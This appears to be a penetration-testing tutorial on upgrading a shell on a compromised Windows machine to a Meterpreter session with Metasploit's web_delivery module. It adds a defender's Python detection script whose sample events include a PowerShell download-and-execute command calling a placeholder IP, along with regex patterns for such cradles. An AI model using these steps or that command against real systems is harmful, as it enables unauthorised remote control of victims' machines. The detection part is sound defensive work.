When attempting to compromise a target, we want as much control as possible over the victim. Meterpreter is one such utility, and it gives us complete control over the victim machine. In most cases, we just exploit the target machine and get a Meterpreter session. However, in some cases the exploit gives us a command shell instead of a Meterpreter session.
In this post, we assume that we already have a command shell on the victim’s machine, and our goal is to upgrade that shell to a Meterpreter session.
STEP 1 : Launch Metasploit and Select the Appropriate Module
Launch Metasploit by typing msfconsole in a terminal, then use the exploit/multi/script/web_delivery module.
STEP 2 : List Options
Now that we are inside the web_delivery module, let’s list the available options.
STEP 3 : Set the target
If you look at the options listing from the previous step, you will notice that the target is set to python by default. We need to change it to powershell.
STEP 4 : Set Payload and other options
Now that the target is set, the next thing to do is set a payload compatible with that target. We also need to set the other mandatory options.
Set lhost and srvhost to the IP address of the attacker’s machine and lport to some arbitrary port. I am going to use 8888 for now.
STEP 5 : Exploit
Now that we have everything set up, let’s run the exploit.
STEP 6 : Getting Meterpreter session
After hitting exploit, Metasploit will set up a reverse TCP listener on the attacker’s machine. It will also generate a Windows command that uses PowerShell to deliver the payload. Now, all you need to do is copy the command and execute it on the victim’s machine. Since you already have a command shell on the victim’s machine, this won’t be difficult.
Now that we have our Meterpreter session, we can proceed to escalate our privileges.
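For defenders, the delivery step above leaves a recognisable trace: a command shell spawning PowerShell with a download-and-run command line. The following is an added example, not code from this post or from Metasploit; it flags that pattern in process-creation events, and the field names, indicator list and sample events are all assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Generic download-cradle traits (an assumption: the page does not reproduce
# the exact command web_delivery prints, so none of it is copied here).
INDICATORS = {
    "no_profile": re.compile(r"(?i)\s-nop(rofile)?\b"),
    "hidden_window": re.compile(r"(?i)\s-w(in(dowstyle)?)?\s+hidden\b"),
    "encoded_command": re.compile(r"(?i)\s-e(nc(odedcommand)?)?\s+[a-z0-9+/=]{20,}"),
    "web_download": re.compile(r"(?i)net\.webclient|downloadstring|invoke-webrequest"),
    "in_memory_exec": re.compile(r"(?i)\biex\b|invoke-expression"),
}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Constructed process-creation events (hypothetical field names, modelled on
# Sysmon Event ID 1); 192.0.2.10 is a documentation-only address.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX ((New-Object "
                "Net.WebClient).DownloadString('http://192.0.2.10:8080/x'))\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ipconfig.exe",
     "cmdline": "ipconfig /all"},
]

def matched_indicators(cmdline):
    """Return the sorted names of every indicator present in a command line."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(cmdline))

def detect(events, threshold=2):
    """Alert on PowerShell launches that fetch or decode a body and show
    at least `threshold` indicators in total."""
    alerts = []
    for ev in events:
        if basename(ev["image"]).lower() not in POWERSHELL:
            continue
        hits = matched_indicators(ev["cmdline"])
        if len(hits) >= threshold and {"web_download", "encoded_command"} & set(hits):
            alerts.append({"parent": basename(ev["parent"]).lower(),
                           "indicators": hits})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The parent process name is kept in each alert because a PowerShell download launched from cmd.exe or a service process deserves more scrutiny than one launched from an administrator's interactive session.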
Note: Use a virtual machine, and scan any program on VirusTotal before downloading it to your host machine, for your privacy.